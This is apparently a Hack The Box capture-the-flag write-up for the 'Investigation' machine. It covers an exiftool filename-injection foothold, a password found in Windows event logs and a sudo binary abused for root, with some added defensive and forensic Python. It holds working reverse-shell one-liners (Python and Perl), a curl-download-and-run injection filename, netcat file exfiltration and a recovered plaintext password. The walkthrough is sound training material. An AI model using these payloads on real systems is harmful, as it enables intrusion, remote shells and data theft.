Investigation

Nmap tells us that there are two ports open (SSH and an Apache web server):

nmap -sC -sV -oA nmap/ -T4 10.129.138.100
# Nmap 7.93 scan initiated Sun Jan 22 11:12:19 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.53.197
Nmap scan report for 10.129.53.197
Host is up (0.076s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
|   256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_  256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 22 11:12:29 2023 -- 1 IP address (1 host up) scanned in 9.63 seconds

The http-title line shows the site redirecting to eforenzics.htb, so there is a virtual host attached to the IP. Let's add it to our /etc/hosts:

(screenshot: /etc/hosts entry mapping the target IP to eforenzics.htb)

The website appears to be built on PHP, and there is a file upload form at /upload.php:

(screenshot: the eforenzics.htb website with the upload form)

After the upload, the page gives us a link to the "forensics" result:

(screenshot: the forensics result, which is plain exiftool output)

The "forensics" result is just exiftool output. Exiftool is a command line program, so chances are the app shells out to it with our uploaded file as an argument, which makes the filename an obvious injection point. Let's play with the file upload a bit: upload a JPEG image through the form again, but this time intercept the request with Burp Suite.

(screenshot: the intercepted upload request with a sleep command in the filename)

Here we simply edited the filename of the image to include a sleep command, and the request really takes 5 seconds to complete, so the filename is reaching a command line. Next, let's get a reverse shell. Note that the filename has to end in a pipe character (|), which is why the payload below looks a bit unusual: the upload handler passes the name to exiftool, and exiftool versions before 12.38 open a filename ending in | with Perl's two-argument open(), which executes the preceding text as a command instead of reading a file.

First, create a folder called www and put a file index.html in it with the following contents:

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

Next, change into the www folder and start a python web server (it listens on port 8000 by default and serves index.html for the root URL):

python3 -m http.server

Before triggering the payload through the upload form, start a netcat listener on port 9001:

nc -lnvp 9001

Next, upload another file and intercept the request with Burp. Before forwarding it, change the filename to the following:

curl 10.10.14.40:8000 --output test && sh test && sleep 10  |

Basically, it downloads the contents of our index.html, saves it as test and runs it with sh; the sleep keeps the exiftool process alive long enough for the shell to connect, and the trailing | is what turns the filename into a command. After sending the request we get a shell as www-data!
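The application-side fix is the usual one: never let a client-chosen filename reach a command line, and certainly not exiftool. Below is an added example (my code, not the box's PHP, which we never get to see) contrasting the pattern the behaviour above implies with a hardened handler that ignores the client name, picks a random server-generated name with an extension derived from the file's magic bytes, and invokes exiftool with an argv list. The temporary directory and the "sleep 5 |" upload name used by demo() are constructed inputs.

```python
import re
import secrets
import subprocess
import tempfile
from pathlib import Path

# Magic bytes -> extension we are willing to store.  Anything else is rejected.
IMAGE_MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png"}
# Shape of every name safe_store() can produce: 32 hex chars plus an allowed extension.
GENERATED_NAME = re.compile(r"^[0-9a-f]{32}\.(jpg|png)$")


def unsafe_store(client_filename: str, data: bytes, upload_dir: Path) -> Path:
    """Pattern the write-up's behaviour implies (hypothetical reconstruction):
    keep the client-chosen name verbatim and later hand it to exiftool.
    A name such as 'sleep 5 |' survives untouched, and '../' would traverse."""
    path = upload_dir / client_filename
    path.write_bytes(data)
    return path


def safe_store(data: bytes, upload_dir: Path) -> Path:
    """Hardened version: the client name is never used.  The extension comes
    from the content's magic bytes and the basename is random, so the stored
    name can contain neither shell metacharacters nor a trailing '|'."""
    for magic, ext in IMAGE_MAGIC.items():
        if data.startswith(magic):
            path = upload_dir / (secrets.token_hex(16) + ext)
            path.write_bytes(data)
            return path
    raise ValueError("not a supported image")


def run_exiftool(path: Path) -> str:
    """argv list, no shell.  Together with the generated name this closes both
    shell injection and exiftool's own trailing-'|' handling (which an exiftool
    at 12.38 or later also no longer has).  Not called by demo()."""
    result = subprocess.run(["exiftool", str(path)], capture_output=True, text=True)
    return result.stdout


def demo() -> dict:
    """Constructed input: a 'JPEG' that is only its magic bytes plus padding,
    uploaded under the injection filename used above."""
    payload = b"\xff\xd8\xff" + b"\x00" * 16
    with tempfile.TemporaryDirectory() as tmp:
        upload_dir = Path(tmp)
        unsafe = unsafe_store("sleep 5 |", payload, upload_dir)
        safe = safe_store(payload, upload_dir)
        try:
            safe_store(b"not an image", upload_dir)
            rejected = False
        except ValueError:
            rejected = True
        return {"unsafe_name": unsafe.name, "safe_name": safe.name, "rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

The unsafe variant is only there to make the contrast concrete; the part worth copying is that the name exiftool eventually sees is one the server made up, so whatever the client put in the Content-Disposition header never matters.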

On the server there is another user, smorton, whose home directory we cannot read. Searching for anything owned by the smorton group that we can reach turns up one more item:

find / -group smorton 2>/dev/null
/home/smorton
/usr/local/investigation/Windows Event Logs for Analysis.msg

Let's transfer the file to our local machine with netcat. On the local machine run:

nc -l -p 1234 -q 1 > message.msg < /dev/null

And on server run:

cat '/usr/local/investigation/Windows Event Logs for Analysis.msg' | nc 10.10.14.40 1234

After downloading the file let's analyze it. file tells us that it is a Microsoft Outlook message file:

joonas@joonas-VirtualBox:~/Documents/htb/investigation$ file message.msg 
message.msg: CDFV2 Microsoft Outlook Message

We can convert it into a readable format with msgconvert (from the libemail-outlook-message-perl package):

msgconvert message.msg

This generates message.eml, which contains the email in plain text form:

(screenshot: the converted email, message.eml)

Interesting: there is some talk about logs, and the rest of the message is a base64-encoded attachment. After decoding it (CyberChef or the base64 command line utility both work; the blob is long so it is not shown here) we are dealing with a zip archive, and unzipping that gives us a file called security.evtx. Running file on it confirms that it is a Windows event log (no surprises here):
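To do the decoding and unzipping in one step, here is an added Python example (not part of the original write-up) that pulls every base64 zip attachment out of a .eml with the standard email module, expands it in memory and checks each member for the .evtx header magic. The message it builds for itself is constructed (placeholder addresses, the attachment name and a stub security.evtx that is only the magic bytes plus padding); run it with the real message.eml as the argument to get the actual log.

```python
import email
import io
import sys
import zipfile
from email import policy
from email.message import EmailMessage

EVTX_MAGIC = b"ElfFile\x00"   # 8-byte header signature of a Windows .evtx file
ZIP_MAGIC = b"PK\x03\x04"     # local file header of a zip archive


def extract_zip_attachments(eml_bytes):
    """Return {member name: bytes} for every file inside every zip attached to
    the message.  get_payload(decode=True) undoes the base64 transfer encoding,
    so there is no need to cut the blob out of the text by hand."""
    msg = email.message_from_bytes(eml_bytes, policy=policy.default)
    members = {}
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True)
        if not payload or not payload.startswith(ZIP_MAGIC):
            continue  # not a zip: leave it alone rather than guess at the format
        with zipfile.ZipFile(io.BytesIO(payload)) as zf:
            for info in zf.infolist():
                members[info.filename] = zf.read(info)
    return members


def is_evtx(data):
    """Cheap sanity check before handing the file to evtx_dump.py."""
    return data.startswith(EVTX_MAGIC)


def build_sample_eml():
    """Constructed stand-in for message.eml (addresses and subject are
    placeholders): a zip holding a stub security.evtx, attached as base64."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("security.evtx", EVTX_MAGIC + b"\x00" * 24)
    msg = EmailMessage()
    msg["From"] = "analyst@example.com"
    msg["To"] = "smorton@example.com"
    msg["Subject"] = "Windows Event Logs for Analysis"
    msg.set_content("Logs attached for analysis.")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="zip", filename="evtx-logs.zip")
    return msg.as_bytes()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            raw = fh.read()
    else:
        raw = build_sample_eml()
    for name, data in extract_zip_attachments(raw).items():
        print(f"{name}: {len(data)} bytes, evtx={is_evtx(data)}")
```

Checking the zip and evtx magic bytes rather than trusting the attachment's declared content type is deliberate: msgconvert preserves whatever Outlook recorded, and that is not always accurate.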

file security.evtx 
security.evtx: MS Windows Vista Event Log, 238 chunks (no. 237 in use), next record no. 20013

We can use evtx_dump.py (from the python-evtx project) to convert the file into XML (alternatively, copy it to a Windows VM and open it in Event Viewer):

evtx_dump.py security.evtx > security.xml

Now we have access to the log file!

The next step can be a bit tedious. My reasoning here was that maybe someone accidentally typed a password in the username field and the Windows event log saved the password in the log. Far-fetched? Maybe, but it worked! Running

cat security.xml |grep TargetUserName |grep -v "Jenkins\|EFORENZICS\|SYSTEM\|ljenkins\|Administrators\|SMorton\|AAnderson"

on the log file shows us a "username" that looks very much like a password:

.....
<Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data> 
.....
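The grep above works, but it depends on knowing every legitimate account name up front and reading the remainder by eye. As an added example (not from the write-up), the Python below does the same hunt over the evtx_dump.py XML more systematically: it walks each <Event> block, keeps only logon-related event IDs, and reports TargetUserName values that are neither known accounts nor machine accounts. The sample XML is constructed to mirror the kind of records described here, not copied from the real log; the known-user list is the one from the grep. Note that a naive "ends with $ means machine account" filter would have discarded the very value we are after, so the machine-account check insists on hostname characters before the $.

```python
import re
from html import unescape

# Logon-related event IDs whose TargetUserName is a name somebody typed or
# presented as a credential; 4688 (process creation) also carries the field
# but there it is the account a process runs as, so it is not interesting here.
LOGON_EVENT_IDS = {"4624", "4625", "4648", "4768", "4771", "4776"}

# Regexes instead of a full XML parser so one malformed record in the dump
# does not abort the whole scan.
EVENT_RE = re.compile(r"<Event\b.*?</Event>", re.S)
EVENT_ID_RE = re.compile(r"<EventID[^>]*>(\d+)</EventID>")
DATA_RE = re.compile(r'<Data Name="([^"]+)">(.*?)</Data>', re.S)
# Machine accounts: hostname characters followed by a single trailing '$'.
MACHINE_ACCOUNT_RE = re.compile(r"^[A-Za-z0-9_-]+\$$")

# Accounts the grep in the write-up already ruled out.
KNOWN_USERS = ["Jenkins", "EFORENZICS", "SYSTEM", "ljenkins",
               "Administrators", "SMorton", "AAnderson"]

# Constructed sample in the layout evtx_dump.py produces (not the real log).
SAMPLE_XML = """<?xml version="1.0" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID Qualifiers="">4624</EventID></System><EventData><Data Name="TargetUserName">ljenkins</Data><Data Name="TargetDomainName">EFORENZICS</Data><Data Name="LogonType">2</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID Qualifiers="">4625</EventID></System><EventData><Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data><Data Name="TargetDomainName">EFORENZICS</Data><Data Name="Status">0xc000006d</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID Qualifiers="">4624</EventID></System><EventData><Data Name="TargetUserName">DC01$</Data><Data Name="TargetDomainName">EFORENZICS</Data><Data Name="LogonType">3</Data></EventData></Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><EventID Qualifiers="">4688</EventID></System><EventData><Data Name="TargetUserName">svc_backup</Data><Data Name="NewProcessName">C:\\Windows\\System32\\cmd.exe</Data></EventData></Event>
</Events>
"""


def iter_events(xml_text):
    """Yield (event_id, {data name: value}) for each <Event> block."""
    for m in EVENT_RE.finditer(xml_text):
        block = m.group(0)
        eid = EVENT_ID_RE.search(block)
        data = {k: unescape(v) for k, v in DATA_RE.findall(block)}
        yield (eid.group(1) if eid else None), data


def unusual_target_users(xml_text, known_users):
    """Return [(event_id, TargetUserName)] for logon events whose target is
    neither a known account nor a machine account."""
    known = {u.lower() for u in known_users}
    hits = []
    for eid, data in iter_events(xml_text):
        if eid not in LOGON_EVENT_IDS:
            continue
        name = data.get("TargetUserName", "")
        if not name or name.lower() in known or MACHINE_ACCOUNT_RE.match(name):
            continue
        hits.append((eid, name))
    return hits


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_XML
    for eid, name in unusual_target_users(text, KNOWN_USERS):
        print(f"event {eid}: TargetUserName={name!r}")
```

Run it against security.xml to get the real list; on a busy domain controller the output will also contain ordinary typos and disabled accounts, which is exactly why the 4625 hits are the ones to read first.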

Luckily for us, the same password is also valid for the user smorton over SSH (password reuse between the domain and this host):

Running sudo -l as smorton reveals that we can run a binary as root without a password:

smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User smorton may run the following commands on investigation:
    (root) NOPASSWD: /usr/bin/binary
smorton@investigation:~$ 

Let's download the binary to our local machine and analyze it on Ghidra.

(screenshot: Ghidra decompilation of /usr/bin/binary)

Ghidra does a pretty good job of reconstructing the C code. The program requires exactly three arguments (argv[0] included) and the third must be the string 'lDnxUysaQn'. It then uses the second argument as the URL for a curl command, runs whatever curl downloaded with perl, and deletes the file afterwards. In other words, the sudo rule lets us download and execute an arbitrary perl script as root; the hard-coded token is the only "protection" and it is sitting in plain sight in the binary. Let's set up a perl reverse shell, saved as shell.pl in the www folder we are still serving on port 8000:

use Socket;$i="10.10.14.40";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};

And once again, set up a netcat listener:

nc -lnvp 9001

And finally, run the binary:

sudo /usr/bin/binary http://10.10.14.40:8000/shell.pl lDnxUysaQn

Running... 

And our netcat listener should have a root shell:

joonas@joonas-VirtualBox:~/Documents/htb/investigation$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.138.100 35924
# whoami
root
# 

GG